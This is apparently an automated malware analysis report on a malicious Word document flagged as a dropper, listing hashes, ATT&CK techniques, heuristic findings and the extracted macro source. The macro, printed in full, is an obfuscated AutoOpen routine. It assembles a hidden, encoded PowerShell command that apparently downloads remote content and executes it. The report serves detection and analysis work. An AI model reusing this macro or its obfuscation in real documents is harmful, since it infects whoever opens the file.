Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 173c0269c68377c8…

MALICIOUS

Office (OLE)

282.5 KB Created: 2018-02-21 14:33:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 17f5e61aa2c44acc66a155e7443aedd2 SHA-1: f6c29584335acbcecc1af9254ef114bb9c135a45 SHA-256: 173c0269c68377c8d790760a8cdb791c3e66ba192091070d8c14249a548e5ec6
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a shell command, likely to download and run a secondary payload, as indicated by the ClamAV detection name 'Doc.Dropper.Agent-6453829-0'. The presence of legacy WordBasic markers and the critical heuristic for a potential Shell call further support this conclusion.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6453829-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6453829-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        FR_MC = FR_MC + AQ_OC
        Shell$ FR_MC
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "freeform"
    Sub AutoOpen()
        Dim FR_MC As String
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5907 bytes
SHA-256: 512714d2c1ff1c9e28381d2ff56478b68d116b8f281837c5aeec9e79aa3df2fc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "freeform"
Sub AutoOpen()
    Dim FR_MC As String
    GN_QI = Array("-", "c", "u", "n", "b", "y", "p", "w", "x", "i", "a", "o", "d", "e", "h", " ", "r", "t", "s", "l")
    Dim EM_NE As String
    EM_NE = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcgBl"
    FR_MC = FR_MC + GN_QI(6)
    FR_MC = FR_MC + GN_QI(11)
    Dim BQ_SF As String
    BQ_SF = "AHQAdQByAG4AIABbAFMAeQBzAH"
    FR_MC = FR_MC + GN_QI(7)
    FR_MC = FR_MC + GN_QI(13)
    Dim FN_RE As String
    FN_RE = "QAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBd"
    FR_MC = FR_MC + GN_QI(16)
    FR_MC = FR_MC + GN_QI(18)
    Dim HK_NF As String
    HK_NF = "ADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0A"
    FR_MC = FR_MC + GN_QI(14)
    FR_MC = FR_MC + GN_QI(13)
    Dim BS_NC As String
    BS_NC = "HIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvA"
    AQ_OC = AQ_OC & EM_NE & BQ_SF & FN_RE & HK_NF & BS_NC
    FR_MC = FR_MC + GN_QI(19)
    FR_MC = FR_MC + GN_QI(19)
    Dim EP_TA As String
    EP_TA = "G4AdgBlAHIAdA"
    FR_MC = FR_MC + GN_QI(15)
    FR_MC = FR_MC + GN_QI(0)
    Dim CK_RJ As String
    CK_RJ = "BdADoAOgBGAHIAbwBtAEIAYQBz"
    FR_MC = FR_MC + GN_QI(7)
    FR_MC = FR_MC + GN_QI(9)
    Dim BK_OC As String
    BK_OC = "AGUANgA0AFMAdAByAGkAbg"
    FR_MC = FR_MC + GN_QI(3)
    FR_MC = FR_MC + GN_QI(12)
    Dim EP_TB As String
    EP_TB = "BnACgAJAB4ACkAKQB9AD"
    FR_MC = FR_MC + GN_QI(11)
    FR_MC = FR_MC + GN_QI(7)
    Dim EK_QE As String
    EK_QE = "sAaQBlAHgAIAAkACgAYQAgACQAKA"
    AQ_OC = AQ_OC & EP_TA & CK_RJ & BK_OC & EP_TB & EK_QE
    FR_MC = FR_MC + GN_QI(18)
    FR_MC = FR_MC + GN_QI(17)
    Dim BL_KE As String
    BL_KE = "AkACgAJAAoAGkAb"
    FR_MC = FR_MC + GN_QI(5)
    FR_MC = FR_MC + GN_QI(19)
    Dim BR_MH As String
    BR_MH = "gB2AG8AawBlAC0AdwBlAGIAcg"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(15)
    Dim IK_QA As String
    IK_QA = "BlAHEAdQBlAHMAdAAg"
    FR_MC = FR_MC + GN_QI(14)
    FR_MC = FR_MC + GN_QI(9)
    Dim GK_RJ As String
    GK_RJ = "ACcAaAB0AH"
    FR_MC = FR_MC + GN_QI(12)
    FR_MC = FR_MC + GN_QI(12)
    Dim CS_PJ As String
    CS_PJ = "QAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAG"
    AQ_OC = AQ_OC & BL_KE & BR_MH & IK_QA & GK_RJ & CS_PJ
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(3)
    Dim AR_PD As String
    AR_PD = "MAZQBuAHQAcgBhAGw"
    FR_MC = FR_MC + GN_QI(15)
    FR_MC = FR_MC + GN_QI(0)
    Dim IQ_OJ As String
    IQ_OJ = "ALgB0AGEAYgBsAGUALgBjAG8Acg"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(8)
    Dim JO_SJ As String
    JO_SJ = "BlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQ"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(1)
    Dim DN_LF As String
    DN_LF = "BoAG8AdQBzAGUAPwAkAGYAaQBsAHQA"
    FR_MC = FR_MC + GN_QI(2)
    FR_MC = FR_MC + GN_QI(17)
    Dim GL_TI As String
    GL_TI = "ZQByAD0AUABhAHIAdABp"
    AQ_OC = AQ_OC & AR_PD & IQ_OJ & JO_SJ & DN_LF & GL_TI
    FR_MC = FR_MC + GN_QI(9)
    FR_MC = FR_MC + GN_QI(11)
    Dim BP_OD As String
    BP_OD = "AHQAaQBvAG4ASwB"
    FR_MC = FR_MC + GN_QI(3)
    FR_MC = FR_MC + GN_QI(6)
    Dim AM_LF As String
    AM_LF = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQA"
    FR_MC = FR_MC + GN_QI(11)
    FR_MC = FR_MC + GN_QI(19)
    Dim DN_NG As String
    DN_NG = "lADIANwAmACQAUwBlAGw"
    FR_MC = FR_MC + GN_QI(9)
    FR_MC = FR_MC + GN_QI(1)
    Dim DQ_KJ As String
    DQ_KJ = "AZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwADEAN"
    FR_MC = FR_MC + GN_QI(5)
    FR_MC = FR_MC + GN_QI(15)
    Dim DR_PG As String
    DR_PG = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBz"
    AQ_OC = AQ_OC & BP_OD & AM_LF & DN_NG & DQ_KJ & DR_PG
    FR_MC = FR_MC + GN_QI(4)
    FR_MC = FR_MC + GN_QI(5)
    Dim BS_PB As String
    BS_PB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG"
    FR_MC = FR_MC + GN_QI(6)
    FR_MC = FR_MC + GN_QI(10)
    Dim DR_MF As String
    DR_MF = "QAbABhAGMAdQBwACYAcwBlA"
    FR_MC = FR_MC + GN_QI(18)
    FR_MC = FR_MC + GN_QI(18)
    Dim HT_LD As String
    HT_LD = "D0AMgAwADEANwAtADEAMAAtADAANgBUADIAMg"
    FR_MC = FR_MC + GN_QI(15)
    FR_MC = FR_MC + GN_QI(0)
    Dim EO_RA As String
    EO_RA = "A6ADQAMQA6ADEAMgBaACYAcwB0AD0AMgAwADEANwAt"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(15)
    Dim CP_RD As String
    CP_RD = "ADAAOQAtADIAOABUADEANAA6ADQ"
    AQ_OC = AQ_OC & BS_PB & DR_MF & HT_LD & EO_RA & CP_RD
    Dim GL_LD As String
    GL_LD = "AMQA6ADEAMg"
    Dim GP_OB As String
    GP_OB = "BaACYAcwBwAHIAPQBoAHQAdABwAHMAJgBzAGkAZwA9AH"
    Dim CK_SI As String
    CK_SI = "QAegBQADcAYwA4AHgAWgBoAHIAMQBzAGIAdgB4ADkAZgB"
    Dim JM_KA As String
    JM_KA = "KAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI"
    Dim BT_TB As String
    BT_TB = "AbgBsAGwAdQBuAEgAaQBmAEwAM"
    AQ_OC = AQ_OC & GL_LD & GP_OB & CK_SI & JM_KA & BT_TB
    Dim IQ_RI As String
    IQ_RI = "wBoAHgAag"
    Dim AL_LC As String
    AL_LC = "A0ACUAMwBEACcAIAAtAEgA"
    Dim FK_QF As String
    FK_QF = "ZQBhAGQAZQByAHMAIABAAHsAJwBBAGMAYwBlAHAAdAAnAD0"
    Dim AT_OI As String
    AT_OI = "AJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALwBKAFMATwBOA"
    Dim FP_SI As String
    FP_SI = "CcAfQApAC4AQwBvAG4AdABlAG4AdAAg"
    AQ_OC = AQ_OC & IQ_RI & AL_LC & FK_QF & AT_OI & FP_SI
    Dim AQ_RH As String
    AQ_RH = "AHwAIABDAG8AbgB2AGUAcgB0AE"
    AQ_OC = AQ_OC & AQ_RH
    Dim BQ_QF As String
    BQ_QF = "YAcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1"
    AQ_OC = AQ_OC & BQ_QF
    Dim IL_OC As String
    IL_OC = "AGUALgBkAGEAdABhACkAKQA="
    AQ_OC = AQ_OC & IL_OC
    FR_MC = FR_MC + AQ_OC
    Shell$ FR_MC
End Sub